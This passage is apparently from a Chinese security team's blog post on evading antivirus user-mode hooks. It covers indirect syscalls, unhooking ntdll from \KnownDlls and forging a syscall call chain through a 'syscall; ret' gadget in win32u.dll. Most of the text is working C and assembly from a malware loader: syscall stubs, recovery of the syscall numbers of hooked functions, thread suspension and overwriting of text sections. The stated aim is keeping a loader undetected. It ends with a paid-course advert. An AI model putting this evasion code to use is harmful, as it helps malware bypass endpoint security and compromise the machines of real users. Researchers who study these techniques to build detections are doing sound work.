// other syscalls ...

间接系统调用的好处

执行间接系统调用而非直接系统调用的好处是：安全解决方案会查找从 NTDLL 地址空间之外调用的系统调用，并将其视为可疑系统调用。

使用间接系统调用时，系统调用指令会从 NTDLL 的地址空间执行，就像正常的系统调用一样。

因此，与直接系统调用相比，间接系统调用更容易躲过安全解决方案的检查。

3.3 解钩（脱钩）

解除挂钩是另一种逃避挂钩的方法，即将加载到内存中的挂钩 NTDLL 库替换为未挂钩的版本。

可以从多个地方获取未挂钩的版本，但常用方法之一是直接从磁盘加载。这样做将删除放置在 NTDLL 库内的所有挂钩。

4# 优缺点总结和利用代码

4.1 Syscall的优点

优势就笔者个人的经验来说，使用某特别的方式间接调用 nt函数，杀软没法直接或者快速查询你的函数使用。

但这里我们其实不能说你使用的所有 nt 函数或者操作行为就是安全的，比如注入这种在 loader 中我个人是不太喜欢的使用的，行为过于明显。

4.2 Syscall的缺点

劣势也是非常的明显，在不 unhook r3 层，你的 nt 函数使用依旧是受到杀软监管的，当然让笔者认为最大的劣势还是在于调用链的不够完整。

这个所谓的调用链不够完整是什么意思，打个比方，我们在使用 VirtualAlloc 函数的时候，它的调用链是从 kernel32 到 kernelbase 最后到 ntdll，最后使用 NtAllocateVirtualMemory，简而言之就是加载的底层函数是 NtAllocateVirtualMemory。

如果我们使用市面上大部分的间接调用技术我们的调用将会直接的跳过 kernel32 和 kernelbase，直接走到 ntdll 当中。这就会让杀软认为你的函数调用链存在差异，当然这种调用链的缺失并不是所有杀软的都会特别在意或者成为立即查杀你的原因，但为了能更长期的稳定运行，我们或许可以尝试伪造一个完整的调用链，接下来我们会实现 unhook 以及尝试构造一个伪链来帮我们处理 syscall。

4.3 原理讲解

我们这里暂不深入讨论内存存根的问题，从 \KnwonDlls\ 目录 unhook 并不是绕过 r3 hook 的新方法。但是我们会尝试避免在执行此操作时分配 RWX 内存。

例如其中需要 RWX 权限来替换挂钩模块的文本部分，同时允许执行这些文本部分中的函数，我们将先暂停正在运行的线程，试图阻止从目标文本部分中调用任何函数，从而无需在 unhook 之前将它们设置为 RWX ，从而只需要 RW 权限。

但是，这种方法产生了另一个问题；在 unhook NtProtectVirtualMemory 系统调用和其他系统调用使用 ntdll 模块内的系统调用指令作为间接系统调用方法，unhook 的模块将被标记为 RW 权限，因此无法执行间接系统调用。

因为我们要跳转到的系统调用指令现在无法执行，所以我们必须跳转到另一个可执行位置，那么我们可以尝试在 system32 下面寻找一个可作为跳板的dll来实现这个，这里我们选择 win32u.dll/win32u.dll存在一些最终同样使用 nt函数的基础函数，基础函数你可理解为类似于 VirtualAlloc 这样的函数。当我们完成一些列的操作之后，我们将恢复暂停的线程，并实现我们的目的 uhook 加间接调用。

4.4 利用代码细节

汇编代码如下：

.data
    dwSyscallNumber        DWORD   0h          ; the SSn 
    qSyscallInsAddress    QWORD   0h          ; the address of a "syscall; ret;" instruction 
.code
    public SetConfig
SetConfig proc    
    mov dwSyscallNumber, ecx
    mov qSyscallInsAddress, rdx            
    ret
SetConfig endp
    public HellHall
HellHall proc
    mov r10, rcx
    mov eax, dwSyscallNumber                 
    jmp qword ptr [qSyscallInsAddress]        
    ret
HellHall endp
end

第一步，加载 shell32.dll，SHGetFolderPathW 会强制加载 win32u.dll，无需我们直接加载：

HRESULT AddWin32uToIat()
{
    WCHAR szPath[MAX_PATH] = { 0 };
    return SHGetFolderPathW(NULL, CSIDL_MYVIDEO, NULL, NULL, szPath);
}

第二步，初始化我们的 syscall 方法并通过 peb 找到 ntdll，并检查是否被hook：

BOOL InitilizeNtdllConfig() {
    //  CHECK
    if (NtdllSt.pdwArrayOfFunctions != NULL && NtdllSt.pdwArrayOfNames != NULL && NtdllSt.pwArrayOfOrdinals != NULL)
        return TRUE;
    PPEB                    pPeb = NULL;
    PLDR_DATA_TABLE_ENTRY   pDte = NULL;
    PBYTE                   uNtdll = NULL;
    RtlSecureZeroMemory(&NtdllSt, sizeof(NTDLL));
    //  PEB
    pPeb = (PPEB)__readgsqword(0x60);
    if (pPeb == NULL || pPeb->OSMajorVersion != 0xA)
        return FALSE;
    //  NTDLL
    pDte = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
    if (!pDte)
        return FALSE;
    NtdllSt.pNtdll = uNtdll = pDte->DllBase;
    //  DOS
    NtdllSt.pImgDos = (PIMAGE_DOS_HEADER)uNtdll;
    if (NtdllSt.pImgDos->e_magic != IMAGE_DOS_SIGNATURE)
        return FALSE;
    //  NT
    NtdllSt.pImgNtHdrs = (PIMAGE_NT_HEADERS)(uNtdll + NtdllSt.pImgDos->e_lfanew);
    if (NtdllSt.pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
        return FALSE;
    //  EXPORT
    NtdllSt.pImgExpDir = (PIMAGE_EXPORT_DIRECTORY)(uNtdll + NtdllSt.pImgNtHdrs->OptionalHeader.DataDirectory[0].VirtualAddress);
    if (!NtdllSt.pImgExpDir || !NtdllSt.pImgExpDir->Base)
        return NULL;
    //  ARRAYS
    NtdllSt.pdwArrayOfFunctions = (PDWORD)(uNtdll + NtdllSt.pImgExpDir->AddressOfFunctions);
    NtdllSt.pdwArrayOfNames        = (PDWORD)(uNtdll + NtdllSt.pImgExpDir->AddressOfNames);
    NtdllSt.pwArrayOfOrdinals    = (PWORD)(uNtdll + NtdllSt.pImgExpDir->AddressOfNameOrdinals);
    //  CHECK
    if (!NtdllSt.pdwArrayOfFunctions || !NtdllSt.pdwArrayOfNames || !NtdllSt.pwArrayOfOrdinals)
        return FALSE;
    return TRUE;
}
BOOL InitilizeSysFunc(IN DWORD dwSysFuncHash, OUT PSYSCALL pSyscall)
{
    if (!dwSysFuncHash || (!NtdllSt.pNtdll && !InitilizeNtdllConfig()))
        return FALSE;
    for (DWORD i = 0; i < NtdllSt.pImgExpDir->NumberOfFunctions; i++) {
        CHAR* cFuncName = (CHAR*)(NtdllSt.pdwArrayOfNames[i] + NtdllSt.pNtdll);
        if (HASHb(cFuncName) == dwSysFuncHash)
        {
            pSyscall->dwSysFuncHash     = dwSysFuncHash;
            pSyscall->pSyscallAddress   = (PVOID)(NtdllSt.pdwArrayOfFunctions[NtdllSt.pwArrayOfOrdinals[i]] + NtdllSt.pNtdll);
            if (*((PBYTE)pSyscall->pSyscallAddress) == 0x4c
                && *((PBYTE)pSyscall->pSyscallAddress + 1) == 0x8b
                && *((PBYTE)pSyscall->pSyscallAddress + 2) == 0xd1
                && *((PBYTE)pSyscall->pSyscallAddress + 3) == 0xb8
                && *((PBYTE)pSyscall->pSyscallAddress + 6) == 0x00
                && *((PBYTE)pSyscall->pSyscallAddress + 7) == 0x00) {
                BYTE high = *((PBYTE)pSyscall->pSyscallAddress + 5);
                BYTE low = *((PBYTE)pSyscall->pSyscallAddress + 4);
                pSyscall->dwSyscallNumber = (high << 8) | low;
                break;
            }
            //if hooked check the neighborhood to find clean syscall 1
            if (*((PBYTE)pSyscall->pSyscallAddress) == 0xe9) {
                for (WORD idx = 1; idx <= 500; idx++) {
                    // check neighboring syscall down
                    if (*((PBYTE)pSyscall->pSyscallAddress + idx * DOWN) == 0x4c
                        && *((PBYTE)pSyscall->pSyscallAddress + 1 + idx * DOWN) == 0x8b
                        && *((PBYTE)pSyscall->pSyscallAddress + 2 + idx * DOWN) == 0xd1
                        && *((PBYTE)pSyscall->pSyscallAddress + 3 + idx * DOWN) == 0xb8
                        && *((PBYTE)pSyscall->pSyscallAddress + 6 + idx * DOWN) == 0x00
                        && *((PBYTE)pSyscall->pSyscallAddress + 7 + idx * DOWN) == 0x00) {
                        BYTE high = *((PBYTE)pSyscall->pSyscallAddress + 5 + idx * DOWN);
                        BYTE low = *((PBYTE)pSyscall->pSyscallAddress + 4 + idx * DOWN);
                        pSyscall->dwSyscallNumber = (high << 8) | low - idx;
                        break;
                    }
                    // check neighboring syscall up
                    if (*((PBYTE)pSyscall->pSyscallAddress + idx * UP) == 0x4c
                        && *((PBYTE)pSyscall->pSyscallAddress + 1 + idx * UP) == 0x8b
                        && *((PBYTE)pSyscall->pSyscallAddress + 2 + idx * UP) == 0xd1
                        && *((PBYTE)pSyscall->pSyscallAddress + 3 + idx * UP) == 0xb8
                        && *((PBYTE)pSyscall->pSyscallAddress + 6 + idx * UP) == 0x00
                        && *((PBYTE)pSyscall->pSyscallAddress + 7 + idx * UP) == 0x00) {
                        BYTE high = *((PBYTE)pSyscall->pSyscallAddress + 5 + idx * UP);
                        BYTE low = *((PBYTE)pSyscall->pSyscallAddress + 4 + idx * UP);
                        pSyscall->dwSyscallNumber = (high << 8) | low + idx;
                        break;
                    }
                }
                break;
            }
            //if hooked check the neighborhood to find clean syscall 2
            if (*((PBYTE)pSyscall->pSyscallAddress + 3) == 0xe9) {
                for (WORD idx = 1; idx <= 500; idx++) {
                    // check neighboring syscall down
                    if (*((PBYTE)pSyscall->pSyscallAddress + idx * DOWN) == 0x4c
                        && *((PBYTE)pSyscall->pSyscallAddress + 1 + idx * DOWN) == 0x8b
                        && *((PBYTE)pSyscall->pSyscallAddress + 2 + idx * DOWN) == 0xd1
                        && *((PBYTE)pSyscall->pSyscallAddress + 3 + idx * DOWN) == 0xb8
                        && *((PBYTE)pSyscall->pSyscallAddress + 6 + idx * DOWN) == 0x00
                        && *((PBYTE)pSyscall->pSyscallAddress + 7 + idx * DOWN) == 0x00) {
                        BYTE high = *((PBYTE)pSyscall->pSyscallAddress + 5 + idx * DOWN);
                        BYTE low = *((PBYTE)pSyscall->pSyscallAddress + 4 + idx * DOWN);
                        pSyscall->dwSyscallNumber = (high << 8) | low - idx;
                        break;
                    }
                    // check neighboring syscall up
                    if (*((PBYTE)pSyscall->pSyscallAddress + idx * UP) == 0x4c
                        && *((PBYTE)pSyscall->pSyscallAddress + 1 + idx * UP) == 0x8b
                        && *((PBYTE)pSyscall->pSyscallAddress + 2 + idx * UP) == 0xd1
                        && *((PBYTE)pSyscall->pSyscallAddress + 3 + idx * UP) == 0xb8
                        && *((PBYTE)pSyscall->pSyscallAddress + 6 + idx * UP) == 0x00
                        && *((PBYTE)pSyscall->pSyscallAddress + 7 + idx * UP) == 0x00) {
                        BYTE high = *((PBYTE)pSyscall->pSyscallAddress + 5 + idx * UP);
                        BYTE low = *((PBYTE)pSyscall->pSyscallAddress + 4 + idx * UP);
                        pSyscall->dwSyscallNumber = (high << 8) | low + idx;
                        break;
                    }
                }
                break;
            }
        }
    }
    if (!pSyscall->pSyscallAddress || !pSyscall->dwSyscallNumber)
        return FALSE;
    return SearchForRop(&pSyscall->pSyscallInstAddress);
}
BOOL SearchForRop(OUT PVOID* ppRopAddress) {
    PPEB                    pPeb = (PEB*)(__readgsqword(0x60));
    PPEB_LDR_DATA            pLdr = (PPEB_LDR_DATA)(pPeb->LoaderData);
    PLDR_DATA_TABLE_ENTRY    pDte = (PLDR_DATA_TABLE_ENTRY)(pLdr->InMemoryOrderModuleList.Flink);
    // 'i' is used to skip over the local image and ntdll image
    unsigned int            i = 0;
    while (pDte) {
        if (pDte->FullDllName.Length != NULL) {
            // define 'SEARCH_ALL_DLLS' to search all the loaded modules - not recommended tho
            // cuz if an ROP is found outside of win32udll, it will be an RW .text section (will be done later when unhooking), 
            // and thus the process will crash
#ifdef SEARCH_ALL_DLLS
            if (i >= 2) {
#else        
            // search only in 'win32udll' because its the only module to be RX when unhooking
            if (HASHb(pDte->FullDllName.Buffer) == win32udll_CRC32b || HASHb(pDte->FullDllName.Buffer) == WIN32UDLL_CRC32b) {
#endif // SEARCH_ALL
#ifdef DEBUG
                PRINTW(L">>> Searching in \"%s\" ... \n", pDte->FullDllName.Buffer)
#endif // DEBUG
                ULONG_PTR uModule = (ULONG_PTR)pDte->InInitializationOrderLinks.Flink;
                PIMAGE_DOS_HEADER pDosHdr = (PIMAGE_DOS_HEADER)uModule;
                if (pDosHdr->e_magic != IMAGE_DOS_SIGNATURE)
                    return FALSE;
                PIMAGE_NT_HEADERS pNtHdrs = (PIMAGE_NT_HEADERS)(uModule + pDosHdr->e_lfanew);
                if (pNtHdrs->Signature != IMAGE_NT_SIGNATURE)
                    return FALSE;
                // search only in the text section, where we have RX permissions
                PVOID    pTxtSection = (PVOID)(uModule + pNtHdrs->OptionalHeader.BaseOfCode);
                SIZE_T    sTextSize   = (SIZE_T)pNtHdrs->OptionalHeader.SizeOfCode;
                // searching for
                // 
                //     
                // instructions
                for (size_t j = 0; j < sTextSize; j++) {
                    if (*((PBYTE)pTxtSection + j) == 0x0F && *((PBYTE)pTxtSection + j + 1) == 0x05 && *((PBYTE)pTxtSection + j + 2) == 0xC3) {
#ifdef DEBUG
                        PRINTA("\t[+] Found \"syscall; ret\" gadget At - 0x%p \n", ((PBYTE)pTxtSection + j))
#endif // DEBUG
                        *ppRopAddress = (PVOID)((PBYTE)pTxtSection + j);
                        return TRUE;
                    }
                }
            }
        }
        else {
            break;
        }
        pDte = *(PLDR_DATA_TABLE_ENTRY*)(pDte);
        i++;
    }
    if (*ppRopAddress == NULL)
        return FALSE;
    else
        return TRUE;
}

第三步，通过 peb 自实现 GetModuleHandle 和 GetProcAddress 这里不给出代码。
第四步，直接进行 unhook：

BOOL RefreshAllDlls() {
#if _WIN64
    PPEB pPeb = (PPEB)__readgsqword(0x60);
#else
    PPEB pPeb = NULL;
#endif
    if (pPeb == NULL || (pPeb != NULL && pPeb->OSMajorVersion != 0xA)) {
        return FALSE;
    }
    PLIST_ENTRY        Head                    = NULL,
                    Next                    = NULL;
    NTSTATUS        STATUS                  = NULL;
    LPVOID            KnownDllDllModule       = NULL,
                    CurrentDllModule        = NULL;
    PVOID            pLocalTxtAddress        = NULL,
                    pRemoteTxtAddress        = NULL;
    SIZE_T            sLocalTxtSize           = NULL;
    DWORD            dwOldPermission         = NULL;
    Head = &pPeb->LoaderData->InMemoryOrderModuleList;
    // skipping the local image, because we know its not in \KnownDlls\ folder 
    Next = Head->Flink->Flink;
    // suspending all local threads, to prevent executing RW memory
    if (!SuspendAndResumeLocalThreads(SUSPEND_THREADS))
        return FALSE;
    // loop through all dlls:
    while (Next != Head) {
        // getting the dll name:
        PLDR_DATA_TABLE_ENTRY    pLdrData = (PLDR_DATA_TABLE_ENTRY)((PBYTE)Next - offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks));
        PUNICODE_STRING            DllName = (PUNICODE_STRING)((PBYTE)&pLdrData->FullDllName + sizeof(UNICODE_STRING));
        // if not win32u.dll, bcz our rop gadgets are in 'win32u.dll' (and we need to keep it RX)
        if (HASHb(DllName->Buffer) != win32udll_CRC32b && HASHb(DllName->Buffer) != WIN32UDLL_CRC32b) {
            // getting the dll's handle from \KnownDlls\ : in case it returned null, that's ok, cz the dll may not be in KnownDlls after all ...
            KnownDllDllModule = GetDllFromKnownDll(DllName->Buffer);
            CurrentDllModule = (LPVOID)(pLdrData->DllBase);
            // if we had the dll mapped with a valid address from KnownDlls:
            if (KnownDllDllModule != NULL && CurrentDllModule != NULL) {
                // get the dos & nt headers of our local dll
                PIMAGE_DOS_HEADER CurrentDllImgDosHdr = (PIMAGE_DOS_HEADER)CurrentDllModule;
                if (CurrentDllImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) {
                    return FALSE;
                }
                PIMAGE_NT_HEADERS CurrentDllImgNtHdr = (PIMAGE_NT_HEADERS)((PBYTE)CurrentDllModule + CurrentDllImgDosHdr->e_lfanew);
                if (CurrentDllImgNtHdr->Signature != IMAGE_NT_SIGNATURE) {
                    return FALSE;
                }
                // get the address of the module's txt section & its size & calculate the knowndll txt section address
                for (int i = 0; i < CurrentDllImgNtHdr->FileHeader.NumberOfSections; i++) {
                    PIMAGE_SECTION_HEADER pImgSec = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(CurrentDllImgNtHdr) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
                    if ((*(ULONG*)pImgSec->Name | 0x20202020) == 'xet.') {
                        sLocalTxtSize = pImgSec->Misc.VirtualSize;
                        pLocalTxtAddress = (PVOID)((ULONG_PTR)CurrentDllModule + pImgSec->VirtualAddress);
                        pRemoteTxtAddress = (PVOID)((ULONG_PTR)KnownDllDllModule + pImgSec->VirtualAddress);
                    }
                }
                // small check here ...
                if (sLocalTxtSize == NULL || pLocalTxtAddress == NULL || pRemoteTxtAddress == NULL) {
                    return FALSE;
                }
                // if both have the same bytes, its a valid text section
                if (*(ULONG_PTR*)pLocalTxtAddress != *(ULONG_PTR*)pRemoteTxtAddress)
                    return FALSE;
                PVOID         pAddress   = pLocalTxtAddress;
                SIZE_T         sSize      = sLocalTxtSize;
#ifdef DEBUG
                PRINTW(L"\n[i] Replacing .txt of %s ... ", DllName->Buffer);
                PRINTA("\n\t> pLocalTxtAddress : 0x%p \n\t> pRemoteTxtAddress : 0x%p \n", pLocalTxtAddress, pRemoteTxtAddress);
#endif // DEBUG
                INITIALIZE_SYSCALL(NTAPIs.NtProtectVirtualMemory);
                if (!NT_SUCCESS((STATUS = HellHall((HANDLE)-1, &pAddress, &sSize, PAGE_READWRITE, &dwOldPermission)))) {
#ifdef DEBUG
                    PRINTA("[!] NtProtectVirtualMemory [1] Failed With Status : 0x%0.8X (Unhook.c:262)\n", STATUS);
#endif // DEBUG
                    return FALSE;
                }
                _memcpy(pLocalTxtAddress, pRemoteTxtAddress, sLocalTxtSize);
                INITIALIZE_SYSCALL(NTAPIs.NtProtectVirtualMemory);
                if (!NT_SUCCESS((STATUS = HellHall((HANDLE)-1, &pAddress, &sSize, dwOldPermission, &dwOldPermission)))) {
#ifdef DEBUG
                    PRINTA("[!] NtProtectVirtualMemory [2] Failed With Status : 0x%0.8X (Unhook.c:272)\n", STATUS);
#endif // DEBUG
                    return FALSE;
                }
                // unmap the KnownDlls dll
                INITIALIZE_SYSCALL(NTAPIs.NtUnmapViewOfSection);
                if (!NT_SUCCESS((STATUS = HellHall(NtCurrentProcess(), KnownDllDllModule)))) {
#ifdef DEBUG
                    PRINTA("[!] NtUnmapViewOfSection Failed With Status : 0x%0.8X (Unhook.c:282)\n", STATUS);
#endif // DEBUG
                    return FALSE;
                }
#ifdef DEBUG
                PRINTA("[+] DONE \n");
#endif // DEBUG
            }
        }
        // continue to the next dll ...
        Next = Next->Flink;
    }
    // resuming all local threads
    if (!SuspendAndResumeLocalThreads(RESUME_THREADS))
        return FALSE;
    return TRUE;
}
BOOL SuspendAndResumeLocalThreads(enum THREADS State) {
    // small trick ;)
    DWORD                        dwCurrentProcessId      = __readgsqword(0x40); 
    DWORD                        dwRunningThread         = __readgsqword(0x48);
    HANDLE                        hSnapShot               = INVALID_HANDLE_VALUE,
                                hThread                    = 0x00;
    NTSTATUS                    STATUS                  = 0x00;
    THREADENTRY32                Thr32                   = { .dwSize = sizeof(THREADENTRY32) };
    OBJECT_ATTRIBUTES            ObjAttr                 = { 0 };
    CLIENT_ID                    ClientId                = { 0 };
#ifdef DEBUG
    PRINTA("\n");
#endif // DEBUG
    hSnapShot = WINAPIs.pCreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, NULL);
    if (hSnapShot == INVALID_HANDLE_VALUE) {
#ifdef DEBUG
        PRINTA("[!] CreateToolhelp32Snapshot Failed With Error : %d (Unhook.c:59)\n", GetLastError());
#endif // DEBUG
        WINAPIs.pCloseHandle(hSnapShot);
        return FALSE;
    }
    if (!WINAPIs.pThread32First(hSnapShot, &Thr32)) {
#ifdef DEBUG
        PRINTA("[!] Thread32First Failed With Error : %d (Unhook.c:68)\n", GetLastError());
#endif // DEBUG
        WINAPIs.pCloseHandle(hSnapShot);
        return FALSE;
    }
    do {
        if (Thr32.th32OwnerProcessID == dwCurrentProcessId && Thr32.th32ThreadID != dwRunningThread) {
            InitializeObjectAttributes(&ObjAttr, NULL, NULL, NULL, NULL);
            ClientId.UniqueProcess    = (PVOID)Thr32.th32OwnerProcessID;
            ClientId.UniqueThread    = (PVOID)Thr32.th32ThreadID;
            INITIALIZE_SYSCALL(NTAPIs.NtOpenThread);
            if (!NT_SUCCESS((STATUS = HellHall(&hThread, GENERIC_ALL, &ObjAttr, &ClientId)))) {
#ifdef DEBUG
                PRINTA("[!] NtOpenThread Failed With Status : 0x%0.8X (Unhook.c:85)\n", STATUS);
#endif // DEBUG
            }
            if (State == SUSPEND_THREADS) {
#ifdef DEBUG
                PRINTA("\t\t>>> Suspending Thread Of Id : %d ... ", Thr32.th32ThreadID);
#endif // DEBUG
                INITIALIZE_SYSCALL(NTAPIs.NtSuspendThread);
                if (hThread && !NT_SUCCESS(STATUS = HellHall(hThread, NULL))){
#ifdef DEBUG
                    PRINTA("[!] NtSuspendThread Failed With Status : 0x%0.8X (Unhook.c:97)\n", STATUS);
#endif // DEBUG
                }
#ifdef DEBUG
                PRINTA("[+] DONE \n");
#endif // DEBUG
            }
            if (State == RESUME_THREADS) {
#ifdef DEBUG
                PRINTA("\t\t>>> Resuming Thread Of Id : %d ... ", Thr32.th32ThreadID);
#endif // DEBUG
                INITIALIZE_SYSCALL(NTAPIs.NtResumeThread);
                if (hThread && !NT_SUCCESS(STATUS = HellHall(hThread, NULL))) {
#ifdef DEBUG
                    PRINTA("[!] NtResumeThread Failed With Status : 0x%0.8X (Unhook.c:113)\n", STATUS);
#endif // DEBUG
                }
#ifdef DEBUG
                PRINTA("[+] DONE \n");
#endif // DEBUG
            }
            INITIALIZE_SYSCALL(NTAPIs.NtClose);
            if (hThread != NULL)
                HellHall(hThread);
        }
    } while (WINAPIs.pThread32Next(hSnapShot, &Thr32));
#ifdef DEBUG
    PRINTA("\n");
#endif // DEBUG
    WINAPIs.pCloseHandle(hSnapShot);
    return TRUE;
}
LPVOID GetDllFromKnownDll(IN PWSTR DllName) {
    PVOID                pModule                 = 0x00;
    HANDLE                hSection                = 0x00;
    NTSTATUS            STATUS                  = 0x00;
    SIZE_T                ViewSize                = 0x00;
    UNICODE_STRING        UniStr                  = { 0 };
    OBJECT_ATTRIBUTES    ObjAtr                  = { 0 };
    WCHAR                FullName    [MAX_PATH]  = { 0 };
    WCHAR                Buf         [MAX_PATH]  = { L'\\', L'K', L'n', L'o', L'w', L'n', L'D', L'l', L'l', L's', L'\\' };
    _strcpy(FullName, Buf);
    _strcat(FullName, DllName);
    _RtlInitUnicodeString(&UniStr, FullName);
    InitializeObjectAttributes(&ObjAtr, &UniStr, OBJ_CASE_INSENSITIVE, NULL, NULL);
    INITIALIZE_SYSCALL(NTAPIs.NtOpenSection);
    if (!NT_SUCCESS((STATUS = HellHall(&hSection, SECTION_MAP_READ, &ObjAtr)))) {
#ifdef DEBUG
        PRINTW(L"[!] NtOpenSection Failed For \"%s\" With Status : 0x%0.8X [THAT'S PROB OK]\n", FullName, STATUS);
#endif // DEBUG
        return NULL;
    }
    INITIALIZE_SYSCALL(NTAPIs.NtMapViewOfSection);
    if (!NT_SUCCESS((STATUS = HellHall(hSection, NtCurrentProcess(), &pModule, NULL, NULL, NULL, &ViewSize, ViewShare, NULL, PAGE_READONLY)))) {
#ifdef DEBUG
        PRINTW(L"[!] NtMapViewOfSection Failed For \"%s\" With Status : 0x%0.8X (Unhook.c:168)\n", FullName, STATUS);
#endif // DEBUG
        return NULL;
    }
    return pModule;
}

到此为止我们实现了 unhook 加伪造的 syscall 调用链的整体利用。

参考代码和项目：https://github.com/NUL0x4C/AtomLdr

相信能看到这里，也是我们团队的老粉了，感谢各位师傅一直以来的关注和支持~

这里给大家安利一套课程，就是本文作者进行手把手教学的，课程内容非常不错，【曾哥认证（逃】，课程的大纲如下：

如果感兴趣，欢迎加微信 djeijek 进行咨询，先到的师傅有优惠哦~

我是凝，我在渊龙Sec安全团队等你
微信公众号：渊龙Sec安全团队
欢迎关注我，一起学习，一起进步~
本篇文章为团队成员原创文章，请不要擅自盗取！

阅读原文

跳转微信打开